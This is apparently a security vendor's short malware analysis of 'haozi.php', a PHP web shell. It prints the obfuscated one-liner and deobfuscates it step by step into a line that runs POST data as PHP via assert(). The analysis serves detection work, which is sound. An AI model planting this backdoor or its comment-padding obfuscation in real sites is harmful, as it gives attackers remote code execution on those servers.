Malware details

haozi.php

by

Our honeybot catch up again new malware, which is very simple but clever. First look this looks nothing, because there are many PHP style comments in code.

haozi.php

@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/]);

If we remove comment’s away, then code look’s like:

@$_="s"."s"."e"."r";@$_="a".$_."t";@$_(${"_P"."OS"."T"}[0]);

Final if we put this more readable, this is Assert POST:

@$_="a"."s"."s"."e"."r"."t";@$_(${"_P"."OS"."T"}[0]);

Final Decoded haozi.php

@assert(${"_POST"}[0]);

PHP Post payload will be evaluated as PHP code by assert() function.

Final words

Use Malware Expert – Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this kind attacks.